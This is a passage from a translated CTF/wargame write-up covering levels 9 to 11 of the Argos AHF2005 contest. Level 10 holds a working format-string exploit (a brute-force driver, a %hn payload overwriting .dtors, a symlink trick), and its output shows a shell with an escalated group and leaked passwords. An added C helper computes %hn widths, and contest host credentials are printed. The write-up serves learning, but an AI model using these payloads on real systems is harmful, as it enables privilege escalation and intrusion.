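        if (((fake_ebp >> (8 * i)) & 0xff) == 0)
            return 0;
    memset(out, 'A', dummy_len);
    size_t n = dummy_len;
    for (int i = 0; i < 4; i++)
        out[n++] = (unsigned char)(fake_ebp >> (8 * i));
    for (int i = 0; i < 3; i++)
        out[n++] = (unsigned char)(ret >> (8 * i));
    out[n] = 0;
    return n;
}

int main(void)
{
    unsigned char name[64], payload[300];
    size_t n = code_bytes_as_filename(LIBC_START_MAIN_WORDS, 8, name, sizeof name);
    printf("symlink name (%zu bytes):", n);
    for (size_t i = 0; i < n; i++)
        printf("\\x%02x", name[i]);
    printf("\n");
    size_t len = build_level9_payload(264, 0x08049568, 0x00197a00, payload, sizeof payload);
    printf("payload length %zu; bytes after the dummy:", len);
    for (size_t i = 264; i < len; i++)
        printf(" %02x", payload[i]);
    printf("\n");
    return 0;
}
```

The derived name is the 25-byte string passed to ln -s above, and the payload tail is 60 95 04 08 03 7a 19, the same bytes as in the final command. The NUL check on the fake EBP is the part worth keeping: a GOT slot at an address containing 0x00 could not be reached with a string-copy overflow.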
!!!!!!!!!!!!!!!!!! level10 - Fedora Format_String_Bug !!!!!!!!!!!!!!!!!!
/*
# LEVEL10 #
If you log in (SSH) to 168.188.130.233 with the guest2 account (password: guest2_ahf2005),
you will find the level10 problem file. I sincerely wish you luck!!
*/
level10... seems to be the problem everyone who took part struggled with the most.
As far as I know there is no published document on Fedora FSB yet.
Here is a brief synopsis of the attack.
1/ Target .dtors
2/ Overwrite .dtors with the address of an exec* family function in the C library (its address starts with 0x00 and moves between runs, hence the loop)
3/ Code a loop that increments the candidate address by 1 each run
Here is the brief exploit.
- brute_ffsb.c -
#include <stdio.h>
#include <stdlib.h>

/* Raise the second %hn width by one per run, i.e. try the next candidate
 * exec* address, and run the target under strace so the execve() it reaches
 * (and the path it tries) is visible. Press Enter to go to the next value. */
int main( void )
{
int i=34562;
char cmd[1024];
while(1)
{
snprintf(cmd,sizeof cmd,"strace /home/guest2/level10_vul `perl -e 'print \"AAAA\\xa6\\x94\\x04\\x08CCCC\\xa4\\x94\\x04\\x08\",\"%%08x\"x7,\"%%86c%%hn%%%dc%%hn\",\"BB\"'`",i);
system( cmd );
printf ("%s\n",cmd);
i++;
getchar();
}
return 0;
}
strace was used to watch for the execve system call.
With brute_ffsb you find the width at which the program reaches execve with a file path that does not exist (strace shows execve returning -1 because nothing is at that path); create a file at exactly that path and the program will run it, giving a shell.
To create that path I'll use a simple program that makes a symlink.
- link.c -
#include <unistd.h>

/* The path strace showed execve() trying: bytes of the binary's own code that
 * the bogus argument pointer happens to reference, up to the first NUL. Point a
 * symlink of that name at ./shell so the exec succeeds. */
int main( void )
{
symlink( "./shell" , "\xA1\x64\x96\x04\x08\x8B\x10\x85\xD2\x75\xEB\xC6\x05\x68\x96\x04\x08\x01\xC9\xC3\x89\xF6\x55\x89\xE5\x83\xEC\x08\xA1\x70\x95\x04\x08\x85\xC0\x74\x19\xB8" );
return 0;
}
[guest2@localhost .test]$ ../level10_vul `perl -e 'print "AAAA\x6e\x95\x04\x08CCCC\x6c\x95\x04\x08","%08x"x7,"%86c%hn%34794c%hn"'`
.
.
.
$ id
uid=505(guest2) gid=505(guest2) egid=502(level10) groups=505(guest2)
$ cat /home/guest2/level10_password
Wow..
level10 password is "is It possible st1ll?"
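Levels 6, 8 and 10 all rest on the same piece of arithmetic: the %c widths have to bring printf's running character count, taken modulo 65536, to each 16-bit half of the value being written. The C code below is an added example, not code from the write-up, that computes those widths from the number of bytes already printed and the order in which the target addresses appear in the payload, and renders the %N$...c%N+1$hn tail. It is checked against the page's own numbers: 23 bytes before the first %c and the egg address 0xbfffdef0 give level 6's 57049 and 57615; the values 0x0904a1a0 (level 8, 312 bytes printed) and 0x009e8888 (level 10, 72 bytes printed) are reconstructed here from the widths in the write-up, since the page never states them.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* One 16-bit write: target address and the half-word it must receive. */
struct hn_write {
    uint32_t addr;
    uint16_t value;
};

/* Split value into the halves stored at addr (low) and addr+2 (high), in the
 * order the payload lists the addresses. Level 6 lists the low address first;
 * levels 8 and 10 list the high one first because it carries the smaller value. */
void split_value(uint32_t addr, uint32_t value, int low_first, struct hn_write out[2])
{
    struct hn_write lo = { addr,     (uint16_t)(value & 0xffff) };
    struct hn_write hi = { addr + 2, (uint16_t)(value >> 16) };
    out[0] = low_first ? lo : hi;
    out[1] = low_first ? hi : lo;
}

/* printed: bytes already output before the first %c (addresses, padding, the
 * %08x pops). Each width moves the running count so that its low 16 bits equal
 * the next half-word. The subtraction is done modulo 65536, so a target smaller
 * than the current count wraps instead of going negative, and a zero width
 * becomes 65536 because %0c still prints one character. Returns the final count. */
uint32_t hn_widths(uint32_t printed, const struct hn_write *w, int n, uint32_t *widths)
{
    uint32_t count = printed;
    for (int i = 0; i < n; i++) {
        uint32_t width = (w[i].value - (count & 0xffff)) & 0xffff;
        if (width == 0)
            width = 0x10000;
        widths[i] = width;
        count += width;
    }
    return count;
}

/* Render "%A$Wc%A+1$hn%A+2$Wc%A+3$hn", where A is the $-index of the junk word
 * placed in front of the first address (96 in level 6). Returns the length
 * written, or -1 if buf is too small. */
int render_fmt(unsigned arg, const uint32_t *widths, int n, char *buf, size_t cap)
{
    size_t used = 0;
    for (int i = 0; i < n; i++) {
        int k = snprintf(buf + used, cap - used, "%%%u$%uc%%%u$hn",
                         arg + 2 * i, (unsigned)widths[i], arg + 2 * i + 1);
        if (k < 0 || (size_t)k >= cap - used)
            return -1;
        used += (size_t)k;
    }
    return (int)used;
}

int main(void)
{
    /* level 6: 16 bytes of addresses + 7 '+' padding, egg at 0xbfffdef0 */
    struct hn_write w[2];
    uint32_t widths[2];
    char fmt[64];
    split_value(0x080494f8, 0xbfffdef0, 1, w);
    uint32_t total = hn_widths(16 + 7, w, 2, widths);
    render_fmt(96, widths, 2, fmt, sizeof fmt);
    printf("%s   (count ends at %u, low half 0x%04x)\n", fmt, total, total & 0xffff);
    return 0;
}
```

Removing one padding byte lowers `printed` by one and raises the first width by one, which is the rule stated in the level 6 notes. The write-up's level 6 payload uses %n rather than %hn; the widths are identical, because only the low 16 bits of the count land in the half that matters, but the 4-byte %n spills 0x0001 into .dtors+8, which a %hn version avoids.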
!!!!!!!!!!!!!!!!!! level11 - Rule_find(Sense) !!!!!!!!!!!!!!!!!!
/*
# LEVEL11 #
HINT: Port 7979 is open on 168.188.130.232.
It does not affect solving, but occasionally some garbage is appended on the first run(?).
You can ignore it ^^; Sorry~ ㅠㅠ
Well then.. I look forward to your sense!
*/
In this problem, the characters/strings you enter are transformed by a certain rule and echoed back.
Find the rule and make the server print AHF2005, and the attack succeeds.
The remote program prints each input character with 7 subtracted from its ASCII code.
So a few lines of code give the string that makes it print AHF2005: add 7 to each character.
- rule.c -
#include <stdio.h>

/* Shift each character of "AHF2005" up by 7 so the server's -7 undoes it. */
int main( void )
{
printf( "%c%c%c%c%c%c%c\n" ,'A'+7,'H'+7,'F'+7,'2'+7,'0'+7,'0'+7,'5'+7 );
return 0;
}
[hkpco@ns ahf]$ gcc -o rule rule.c
[hkpco@ns ahf]$ ./rule
HOM977<
Now let's send HOM977<.
[hkpco@ns ahf]$ telnet 168.188.130.232 7979
Trying 168.188.130.232...
Connected to 168.188.130.232.
Escape character is '^]'.
HOM977<
# Password was sent to you! :-)
Connection closed by foreign host.
It says the password has been sent to us.
So we can guess it connects back to some port on our host.
Rather than a complicated way of finding which port, I'll solve it with sense, as the problem suggests.
Looking at AHF2005, we can guess the port is 2005.
So listen on port 2005 with nc and receive the password the server sends.
* Those without sense can use a sniffer to see where the server connects.
(terminal1)
[hkpco@localhost ~]$ telnet 168.188.130.232 7979
Trying 168.188.130.232...
Connected to 168.188.130.232 (168.188.130.232).
Escape character is '^]'.
HOM977<
# Password was sent to you! :-)
Connection closed by foreign host.
(terminal2)
[hkpco@localhost ~]$ nc -l -v -p 2005
listening on [any] 2005 ...
168.188.130.232: inverse host lookup failed: Unknown host
connect to [222.122.45.36] from (UNKNOWN) [168.188.130.232] 39052
# Level11 Password is 'DoYouHaveAGirlFriend?'
-+-+-+-+-+-+-+-+-+-+ PostScript -+-+-+-+-+-+-+-+-+-+
During the 48-hour contest, long if you call it long and short if you call it short, I really learned and practiced a lot.
It was especially good that Argos, unlike other contests, was not a stair-step sequence of problems.
Things I clearly used to know did not go well when I actually tried to solve them,
so it was a good chance to refresh my memory.
With the rankings flipping back and forth while we solved, it was a thrilling contest.
And the organizers, who set the problems and monitored all night, really worked hard.
The various fun problems pass through my mind.
Thank you for reading this humble report to the end; I close the document with this postscript.
Really good problems, thank you very much!
Argos, fighting!!